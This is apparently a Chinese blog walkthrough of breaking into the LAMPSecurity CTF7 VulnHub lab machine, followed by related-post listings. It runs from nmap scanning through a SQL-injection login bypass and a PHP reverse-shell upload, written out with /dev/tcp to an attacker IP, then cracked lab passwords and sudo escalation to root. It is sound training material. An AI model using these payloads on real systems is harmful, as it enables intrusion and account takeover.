CTF7plusDocs靶机渗透测试流程

已于 2023-07-15 00:22:03 修改
阅读量220 收藏 1
点赞数
文章标签: 网络 安全 web安全
于 2023-07-15 00:11:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RemedyVI/article/details/131733211
版权

靶机下载地址

LAMPSecurity: CTF7 ~ VulnHub

信息收集

主机探测

sudo nmap -sn 10.10.10.0/24  

发现目标靶机IP地址10.10.10.4

初步扫描 

sudo nmap -sT --min-rate 10000 -p- 10.10.10.4

22/tcp    open   ssh

80/tcp    open   http

137/tcp   closed netbios-ns

138/tcp   closed netbios-dgm

139/tcp   open   netbios-ssn

901/tcp   open   samba-swat

5900/tcp  closed vnc

8080/tcp  open   http-proxy

10000/tcp open   snet-sensor-mgmt

详细信息扫描

sudo nmap -sT -sC -sV -O -p 22,80,137,138,901,5900,8080,10000 10.10.10.4

可以知道以下信息

22/tcp    open   ssh         OpenSSH 5.3 (protocol 2.0)

80/tcp    open   http        Apache httpd 2.2.15 ((CentOS))

139/tcp   open   netbios-ssn

901/tcp   open   http        Samba SWAT administration server 登录

8080/tcp  open   http Apache httpd 2.2.15 ((CentOS)) 登录

10000/tcp open   http        MiniServ 1.610 (Webmin httpd)    webmin

Running: Linux 2.6.X|3.X

漏洞脚本扫描 

sudo nmap -sT --script=vuln -p 22,80,137,138,901,5900,8080,10000 10.10.10.4

可以知道以下关键信息

80

| http-enum:                                                                                             

|   /webmail/: Mail folder       

/config 403

/robots.txt NONE

/SQL 403

/temp

/installer

/plugins/password/

/plugins/userinfo                             

|   /inc/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'   

|_  /webalizer/: 2.21 CVE-2003-1418

/db

/assets 上传的shell

/signup

/newsletter

/profile

/recovery

/phpinfo

8080 SQL注入

| http-enum:                                        

|   /login.php: Possible admin folder

|   /phpmyadmin/: phpMyAdmin                        

/config

user:root

password:''

/robots.txt

|   /docs/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'

|   /icons/: Potentially interesting folder w/ directory listing

|_  /inc/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'

UDP扫描 

sudo nmap -sU --top-ports 100 10.10.10.4

没有有效信息

漏洞发现和利用

SQL注入

访问8080端口,发现是一个登录界面,可能存在SQL注入

尝试用’||1=1#发现成功登录(注意这里无法爆破数据库,权限不够)

文件上传

发现文件上传的地方,尝试上传php反向shell

http://10.10.10.4:8080/readings.php?op=new

上传成功,但是不知道上传的地方在哪里。

在assets目录发现上传的shell文件

反弹shell 

成功获取低权限用户

 攻击机:sudo nc -lvnp 4444

shell脚本可以用kali自带的或者自己写

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.2/4444 0>&1'");?>
这个不用记

权限提升

敏感文件

寻找phpmyadmin路径

在/var/www/admin/phpmyadmin/config路径下找到config.inc.php

查看内容,发现mysql的账户为root,密码为空

数据库登录 

登录数据库成功

mysql -u root -p

获取表信息 

获取到user表信息,这里可以已经可以看/etc/passwd了,数据库的用户都是/etc/passwd可登录用户。 

使用john破解得到明文密码

brian my2cents

john transformersrule

alice turtles77

ruby Shelly2012

leon qwer1234

julia madrid

michael somepassword

bruce LosAngelesLakers

neil Jets4Ever

charles chuck33

foo changeme

test test

ssh登录

使用julia madrid登录ssh
成功登录,并且可执行sudo的ALL操作,切换到root提权成功。

所有用户都要登录来看看,只有julia有sudo权限操作,其它没有。

总结

首先信息收集,然后漏洞寻找,发现8080端口具有SQL注入漏洞然后登录上去。找到文件上传的地方上传shell获取反弹shell,得到一个低权限用户apache。通过寻找phpmyadmin的配置文件找到数据库的登录密码,登录到数据库获取user表里的数据。这里user表里的用户都是可登录ssh的用户,然后通过john暴力破解或网上的工具(我这里用的网上的工具会快很多),最后SSH登录发现有一个用户拥有sudo all权限直接提权到root。

Teardrop、
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
linux下openssh5.3漏洞,linux的低版本中openssh三大漏洞的分析及修复方法
weixin_28797919的博客
05-16 1503
一:漏洞分析最近进行linux系统安全加固分析,进行漏洞扫描扫描分析,不扫不知道,一扫吓一跳,linux系统服务器的OPENSSH存在3大安全漏洞,祥如下:1:OpenSSH GSSAPI 处理远端代码执行漏洞漏洞分类 守护进程类危险级别 高影响平台OpenSSH OpenSSH < 4.4详细描述OpenSSH 4.3 之前的portable 版本存在远端代码执行漏洞. 攻击者可以利用ra...
OpenSSH命令注入漏洞(CVE-2020-15778)
热门推荐
qq_42947816的博客
02-09 2万+
一般在特定环境下利用,比如在知道SSH账户密码后,但禁用SSH登陆或SSH连接被阻止,服务器允许使用scp传文件的情况下,可对其进行命令注入,所以如果攻击者不知道ssh账密,此漏洞无法利用。
linux下openssh5.3漏洞,openssh漏洞修复
weixin_39612726的博客
05-16 1459
为保障在升级openssh过程中出现网络中断导致连接不上服务器,建议先安装telnet服务,当网络中断时,可通过telnet远程到服务器。一、安装telnet服务yum install xinetd 依赖yum install telnet 客户端yum install telnet-server 服务端1、开启telnet服务vim /etc/xinetd.d/telnetservice tel...
一次WEB服务器渗透测试笔记
思索的蜗牛的专栏
06-24 3347
渗透测试是最能直接的反映系统的安全性的一种手段了。现整理了前段时间进行的一次渗透测试的笔记,整个过程中所使用的工具和思路都比较简单,本文也正是为了您的系统不被这些“简单”的东西所击败而作。   此次渗透测试的已知条件只有一个:目标IP地址211.***.***.114。  首先当然是常规的扫描nmap -v -sS -O 211.***.***.114,得到的结果如下:  (The 1
红队笔记9:CTF7打靶流程-sql注入万能密码-密码喷射(vulnhub)
qq_63442530的博客
03-26 1299
目录开头:1.主机发现和端口扫描2.攻击优先级分析:3.80端口和8080端口-sql注入万能密码-报错信息泄露目录结构4.提权-寻找敏感信息(登录凭据)5.密码喷射登录ssh6.总结学习的视频是哔哩哔哩红队笔记:「红队笔记」靶机精讲:LAMPSecurityCTF7 - 字符串魔法、密码喷射,这才是实战技术。_哔哩哔哩_bilibili打靶时参考文章和本文借鉴文章:红队打靶:LampSecurity:CTF7打靶思路详解(vulnhub)_lampsecurityctf-CSDN博客靶机下载链接见:htt
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
CTF6靶机实战.zip
05-25
1. CTF靶机攻防基础:了解靶机的构成和渗透测试的基本流程。 2. 文件上传漏洞:学习如何发现和利用文件上传漏洞,以及如何构造反弹shell。 3. Linux脚本和系统漏洞利用:深入理解系统漏洞,编写和执行利用脚本。 4. ...
30 天渗透测试练习2.pdf
10-06
7. **HackTheBox (HTB) 机器**:HTB是一个在线平台,提供了多种级别的虚拟机,用于提升渗透测试技能。例如Pilgrimage、Topology、PC、Busqueda等,每个机器都有不同的攻防挑战。 8. **基于路由的SSRF(Server-Side ...
59-59.渗透测试-CTF题目案例.mp4
最新发布
05-10
59-59.渗透测试-CTF题目案例.mp4
OpenSSH用户枚举漏洞poc(CVE-2018-15473)
08-24
OpenSSH用户枚举漏洞poc(CVE-2018-15473),通过poc可以直接检查目标服务器是否存在此漏洞,通过检查漏洞,来及早发现漏洞,打上补丁
CTF7靶机搜索不到ip问题
sinat_35845281的博客
07-30 564
CTF7系统没有ip问题
vulnhub靶机练习ctf7
weixin_53665747的博客
06-09 87
vulnhub靶机练习ctf7
HackTheBox::Networked
aya3t的博客
10-12 776
HackTheBox::Networked
CTF7通关笔记
高野02blog
12-10 374
标题记录一个特别简单的靶机CTF7 8080端口登陆页面存在SQL注入攻击 使用sqlmap自动化注入爆库得到用户名密码 | julia%40localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 (madrid) | 使用julia账户登录提权 ...
vulnhub靶机ctf7笔记
Aillikew的博客
11-14 40
最后提权的时候,搜索含有pass字符串的文件也是很有经验的操作,而这步操作正是基于/etc/passwd文件中的多用户bash的情况,很有可能有用户为了方便提权操作,会在自己的目录下存放有关提权的密码文件,我们正是利用了这一点。又经过一系列的搜索,没发现特殊的信息,结合/etc/passwd中有Bash的用户有很多,很有可能其中的某个用户会在自己家目录中的文件里写入有关root的密码。/home/*: 搜索的目录路径,/home/表示在/home/目录下搜索,*表示搜索所有子目录和文件。
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4611
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
网络安全CVE 漏洞分析及复现
jazzz98的博客
05-09 780
Shiro 在路径控制的时候,未能对传入的 url 编码进行 decode 解码,导致攻击者可以绕过过滤器,访问被过滤的路径。
DC-4靶机渗透
weixin_45349299的博客
12-21 982
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一) 在这篇文章中,我们将学习如何搭建Vulnhub靶机渗透环境,并学习JIS-CTF入门知识,以及蚁剑提权示例。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值